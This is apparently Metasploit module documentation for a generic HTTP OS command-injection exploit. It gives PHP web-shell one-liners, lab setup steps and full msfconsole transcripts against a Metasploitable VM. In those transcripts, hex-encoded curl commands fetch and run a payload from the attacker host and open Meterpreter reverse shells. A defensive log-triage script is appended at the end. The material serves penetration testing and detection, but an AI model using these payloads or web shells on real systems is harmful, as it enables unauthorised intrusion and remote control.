documentation/modules/exploit/multi/http/os_cmd_exec.md
This module is for any generic HTTP command execution vulnerability where user-supplied input is passed directly to system execution functions via an HTTP request. As a result, it works against any of the following:
<?php system($_REQUEST["cmd"]); ?>
<?php passthru($_REQUEST["cmd"]); ?>
<?php echo exec($_REQUEST["cmd"]); ?>
<?php echo shell_exec($_REQUEST["cmd"]); ?>
<?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?>
<?php echo `{$_REQUEST["cmd"]}`; ?>
This is similar to exploits/unix/webapp/php_eval, except that it isn't limited to PHP's code execution and can use any OS command execution function.
Setting up a quick PHP test lab on a Debian-based host:
$ sudo apt-get install --yes apache2 php curl
[...]
$
$ sudo systemctl start apache2
$
$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/html/shell.php
<?php system($_REQUEST["cmd"]); ?>
$
$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
1. msfconsole
2. use exploits/multi/http/os_cmd_exec
3. Set RHOSTS and URIPATH (HEADERS and POSTDATA are optional, depending on the vulnerability). You may also want to customize the payload and LHOST if desired.
4. run

HEADERS
Any additional HTTP headers to send, cookies for example. Format: header:value,header2:value2.

POSTDATA
Any HTTP POST method request data to send, with the command injection placeholder set to !INJECT!.
If this value is blank, the module sends an HTTP GET method request instead.

Proxies
A proxy chain of format: type:host:port[,type:host:port][...].
Supported proxies: sapni, socks4, socks5, socks5h, http

RHOSTS
The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html

RPORT
The target port (TCP).
Default: 80

SSL
Negotiate SSL/TLS for outgoing connections.
Default: false

URIPATH
The URI to request, with the command injection placeholder set to !INJECT!.
Default: /ping/?cmd=!INJECT!

VHOST
HTTP server virtual host.
msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/shell.php
<?php system($_REQUEST["cmd"]); ?>
msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
msfadmin@metasploitable:~$
msf exploit(multi/http/os_cmd_exec) > options

Module options (exploit/multi/http/os_cmd_exec):

Name      Current Setting          Required  Description
----      ---------------          --------  -----------
HEADERS                            no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA                           no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
RHOSTS    10.0.0.10                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT     80                       yes       The target port (TCP)
SSL       false                    no        Negotiate SSL/TLS for outgoing connections
URIPATH   /shell.php?cmd=!INJECT!  yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST                              no        HTTP server virtual host

Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):

Name            Current Setting  Required  Description
----            ---------------  --------  -----------
FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE    false            yes       Attempt to delete the binary after execution
FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST                    no        Local IP to use for serving payload
FETCH_SRVPORT   8080             yes       Local port to use for serving payload
FETCH_URIPATH                    no        Local URI to use for serving payload
LHOST           tap0             yes       The listen address (an interface may be specified)
LPORT           4444             yes       The listen port

When FETCH_COMMAND is one of CURL,GET,WGET:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.

When FETCH_FILELESS is none:

Name                Current Setting  Required  Description
----                ---------------  --------  -----------
FETCH_FILENAME      mANdNVqs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces

Exploit target:

Id  Name
--  ----
0   Linux

View the full module info with the info, or info -d command.

msf exploit(multi/http/os_cmd_exec) > check
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
This is on a Metasploitable 2 VM:
msf > use exploits/multi/http/os_cmd_exec
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
RHOSTS => 10.0.0.10
msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
LHOST => tap0
msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
URIPATH => /mutillidae/index.php?page=dns-lookup.php
msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > options

Module options (exploit/multi/http/os_cmd_exec):

Name      Current Setting                                                Required  Description
----      ---------------                                                --------  -----------
HEADERS                                                                  no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
POSTDATA  target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS  no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
Proxies                                                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS    10.0.0.10                                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT     80                                                             yes       The target port (TCP)
SSL       false                                                          no        Negotiate SSL/TLS for outgoing connections
URIPATH   /mutillidae/index.php?page=dns-lookup.php                      yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
VHOST                                                                    no        HTTP server virtual host

Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):

Name            Current Setting  Required  Description
----            ---------------  --------  -----------
FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE    false            yes       Attempt to delete the binary after execution
FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
FETCH_SRVHOST                    no        Local IP to use for serving payload
FETCH_SRVPORT   8080             yes       Local port to use for serving payload
FETCH_URIPATH                    no        Local URI to use for serving payload
LHOST           tap0             yes       The listen address (an interface may be specified)
LPORT           4444             yes       The listen port

When FETCH_COMMAND is one of CURL,GET,WGET:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.

When FETCH_FILELESS is none:

Name                Current Setting  Required  Description
----                ---------------  --------  -----------
FETCH_FILENAME      SYonhqJf         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces

Exploit target:

Id  Name
--  ----
0   Linux

View the full module info with the info, or info -d command.

msf exploit(multi/http/os_cmd_exec) > check
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
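
The check and run requests in both scenarios leave a recognizable shape in web server or WAF logs: an echo of a long random token, followed by a hex-escaped command passed through /bin/echo -ne into sh. The triage script below is an added example, not part of the module or its documentation; it flags both shapes in logged URIs or request bodies and decodes the hex so the analyst can read the command. The sample entries are constructed, and the 16-character token threshold and the availability of logged POST bodies are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log entries (request URIs and POST bodies) shaped like
# the requests in the module output above. The hex string decodes to the
# harmless command "uname -a"; the probe token is made up.
HEX = r"\x75\x6e\x61\x6d\x65\x20\x2d\x61"
SAMPLES = [
    "/shell.php?cmd=echo%20A1b2C3d4E5f6G7h8I9j0",
    "/shell.php?cmd=/bin/echo%20-ne%20%27" + HEX + "%27%7csh",
    "target_host=;echo%20A1b2C3d4E5f6G7h8I9j0&dns-lookup-php-submit-button=Lookup+DNS",
    "target_host=;/bin/echo -ne '" + HEX + "'|sh&dns-lookup-php-submit-button=Lookup+DNS",
    "target_host=example.org&dns-lookup-php-submit-button=Lookup+DNS",
    "/search?q=echo+cancellation",
]

# echo -ne '\xNN...' piped to sh: the wrapper seen in the run requests.
HEX_PIPE = re.compile(r"echo\s+-ne\s+'((?:\\x[0-9a-fA-F]{2})+)'\s*\|\s*sh\b")
# echo <long alphanumeric token> as a whole parameter value: the check probe.
# The minimum length of 16 is an assumption of this example.
PROBE = re.compile(r"[=;|&]\s*echo\s+([A-Za-z0-9]{16,})(?=&|$)")


def classify(entry):
    """Return (verdict, detail) for one logged URI or request body."""
    text = unquote_plus(entry)
    match = HEX_PIPE.search(text)
    if match:
        # Strip the \x prefixes and decode, so the analyst sees the command.
        raw = bytes.fromhex(match.group(1).replace("\\x", ""))
        return ("hex-echo-to-shell", raw.decode("latin-1"))
    match = PROBE.search(text)
    if match:
        return ("echo-probe", match.group(1))
    return ("clean", "")


def scan(entries):
    """Return (index, verdict, detail) for every entry that is not clean."""
    results = ((i, *classify(e)) for i, e in enumerate(entries))
    return [r for r in results if r[1] != "clean"]


if __name__ == "__main__":
    for index, verdict, detail in scan(SAMPLES):
        print(f"entry {index}: {verdict}: {detail!r}")
```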